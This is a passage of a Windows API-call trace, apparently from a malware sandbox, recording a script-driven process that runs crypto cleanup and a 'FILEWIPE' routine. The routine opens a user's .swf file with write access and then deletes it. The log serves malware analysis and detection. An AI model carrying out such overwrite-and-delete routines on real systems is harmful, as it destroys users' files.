lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0193.300] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0193.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0193.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0193.300] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0193.300] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0193.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0193.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0193.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0193.300] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0193.300] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0193.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0193.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0193.308] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0193.308] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0193.308] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0193.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0193.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0193.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0193.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0193.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0193.309] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0193.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0193.309] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0193.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0193.309] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0193.309] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0193.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0193.309] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0193.309] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0193.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0193.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0193.309] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0193.309] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0193.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0193.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0193.310] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0193.310] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0193.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0193.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0193.310] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0193.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0193.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0193.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0193.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0193.310] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.310] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0193.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0193.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0193.310] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0193.310] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0193.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0193.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0193.310] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0193.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0193.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0193.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0193.311] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0193.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0193.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0193.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4b0 [0193.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0193.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0193.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0193.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0193.311] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0193.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0193.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0193.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0193.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0193.311] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.311] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0193.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0193.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0193.311] FreeLibrary (hLibModule=0x74f20000) returned 1 [0193.311] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.311] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.311] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0193.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0193.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0193.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0193.312] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0193.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0193.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0193.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0193.313] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0193.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0193.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0193.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0193.314] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0193.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0193.314] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0193.314] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0193.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0193.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0193.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0193.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0193.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0193.315] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0193.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0193.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0193.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0193.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0193.315] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdac5c230, ftCreationTime.dwHighDateTime=0x1d5e3ca, ftLastAccessTime.dwLowDateTime=0x34054cb0, ftLastAccessTime.dwHighDateTime=0x1d5d919, ftLastWriteTime.dwLowDateTime=0x34054cb0, ftLastWriteTime.dwHighDateTime=0x1d5d919, nFileSizeHigh=0x0, nFileSizeLow=0x14d15, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="VGkX.swf", cAlternateFileName="")) returned 0x90af58 [0193.315] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0193.315] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0193.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0193.316] CharLowerBuffW (in: lpsz="byte[85269]", cchLength=0xb | out: lpsz="byte[85269]") returned 0xb [0193.316] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.316] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0193.316] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.316] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0193.316] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0193.316] FreeLibrary (hLibModule=0x75c90000) returned 1 [0193.316] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.316] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.316] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.317] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0193.317] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.317] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.317] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.317] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.317] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.317] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.317] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.317] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.317] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.317] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.317] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.317] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.317] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.317] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.317] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.317] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.317] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0193.318] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0193.318] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ffd495b2eqp\\vgkx.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0193.318] FreeLibrary (hLibModule=0x75990000) returned 1 [0193.318] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.318] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.318] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.318] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0193.318] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.318] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.318] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0193.319] FreeLibrary (hLibModule=0x75990000) returned 1 [0193.319] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.319] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.319] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.319] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.319] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0193.319] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.319] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.319] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0193.320] FreeLibrary (hLibModule=0x75990000) returned 1 [0193.320] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.320] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.320] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.320] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf", lpFilePart=0x0) returned 0x39 [0193.320] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdac5c230, ftCreationTime.dwHighDateTime=0x1d5e3ca, ftLastAccessTime.dwLowDateTime=0x34054cb0, ftLastAccessTime.dwHighDateTime=0x1d5d919, ftLastWriteTime.dwLowDateTime=0x186c3ee0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x14d15, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="VGkX.swf", cAlternateFileName="")) returned 0x90af58 [0193.320] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ffd495b2eqp\\vgkx.swf")) returned 1 [0193.322] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdac5c230, ftCreationTime.dwHighDateTime=0x1d5e3ca, ftLastAccessTime.dwLowDateTime=0x34054cb0, ftLastAccessTime.dwHighDateTime=0x1d5d919, ftLastWriteTime.dwLowDateTime=0x186c3ee0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x14d15, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="VGkX.swf", cAlternateFileName="")) returned 0 [0193.322] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0193.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0193.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0193.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0193.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0193.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0193.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0193.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0193.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0193.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0193.326] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0193.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0193.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0193.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0193.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0193.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0193.326] HeapFree (in: 